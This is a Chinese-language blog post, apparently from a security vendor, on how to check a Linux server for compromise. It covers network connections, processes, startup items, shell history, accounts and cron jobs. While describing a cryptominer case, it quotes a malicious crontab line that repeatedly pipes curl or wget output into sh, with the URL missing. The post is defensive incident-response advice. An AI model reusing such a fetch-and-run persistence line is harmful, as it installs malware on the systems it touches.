如何排查linux伺服器被入侵

很多客戶網站伺服器被入侵，被攻擊，找到我們SINE安全公司尋求技術支援與幫助，有些網站被篡改，被跳轉，首頁內容被替換，伺服器植入木馬後門，伺服器卡頓，伺服器異常網路連線，有的客戶使用的是阿里雲伺服器，經常被提醒伺服器有挖礦程式，以及網站被上傳webshell的安全提醒，包括騰訊雲提示伺服器有木馬檔案，客戶網站被攻擊的第一時間，是需要立即處理的，降損失降到最低，讓網站恢復正常的訪問，由於每個客戶找到我們SINE安全都是比較著急的，安全的處理時間也需要儘快的處理，根據我們的處理經驗，我們總結了一些伺服器被攻擊，被黑的排查辦法，專門用來檢查伺服器第一時間的安全問題，看發生在哪裡，伺服器是否被黑，是否被攻擊，那些被篡改等等。

如何排查伺服器被攻擊？

首先我們會對當前伺服器的IP，以及IP的地址，linux伺服器名稱，伺服器的版本是centos,還是redhat，伺服器的當前時間，進行收集並記錄到一個txt文件裡，接下來再執行下一步，對當前伺服器的異常網路連線以及異常的系統程式檢查，主要是透過netstat -an以及-antp命令來檢查伺服器存在哪些異常的IP連線。並對連線的IP，進行歸屬地查詢，如果是國外的IP，直接記錄當前程式的PID值，並自動將PID的所有資訊記錄，查詢PID所在的linux檔案地址，緊接著檢查當前佔用CPU大於百分之30的程式，並檢查該程式所在的資料夾。

在我們處理客戶伺服器被攻擊的時候發現很多伺服器的命令被篡改，比如正常的PS檢視程式的，查詢目錄的 cd的命令都給篡改了，讓伺服器無法正常使用命令，檢查伺服器安全造成了困擾。對伺服器的啟動項進行檢查，有些伺服器被植入木馬後門，即使重啟伺服器也還是被攻擊，木馬會自動的啟動，檢查linux的init.d的資料夾裡是否有多餘的啟動檔案，也可以檢查時間，來判斷啟動項是否有問題。

再一個要檢查的地方是伺服器的歷史命令，history很多伺服器被黑都會留下痕跡，比如SSH登入伺服器後，攻擊者對伺服器進行了操作，執行了那些惡意命令都可以透過history查詢的到，有沒有使用wget命令下載木馬，或者執行S件。檢查伺服器的所有賬號，以及當前使用並登入的管理員賬戶，tty是本地使用者登入，pst是遠端連線的使用者登入，來排查伺服器是否被黑，被攻擊，也可以檢查login.defs檔案的uid值，判斷uid的passwd來獲取最近新建的管理員賬戶。執行cat etc/passwd命令檢查是否存在異常的使用者賬戶，包括特權賬戶，UID值為0.

最重要的是檢查伺服器的定時任務，前段時間某網站客戶中了挖礦病毒，一直佔用CPU，檢視了定時任務發現每15分鐘自動執行下載命令，crontab -l */15 * * * * (curl -fsSL ||wget -q-O- )|sh 程式碼如上，自動下載並執行SH木馬檔案。定時任務刪都刪不掉，最後透過檢查系統檔案查到了木馬，並終止程式，強制刪除。有些伺服器被黑後，請立即檢查2天裡被修改的檔案，可以透過find命令去檢查所有的檔案，看是否有木馬後門檔案，如果有可以確定伺服器被黑了。

以上就是伺服器被入侵攻擊的檢查辦法，透過我們SINE安全給出的檢查步驟，挨個去檢查，就會發現出問題，最重要的是要檢查日誌，對這些日誌要仔細的檢查，哪怕一個特徵都會導致伺服器陷入被黑，被攻擊的狀態，也希望我們的分享能夠幫助到更多需要幫助的人，伺服器安全了，帶來的也是整個網際網路的安全。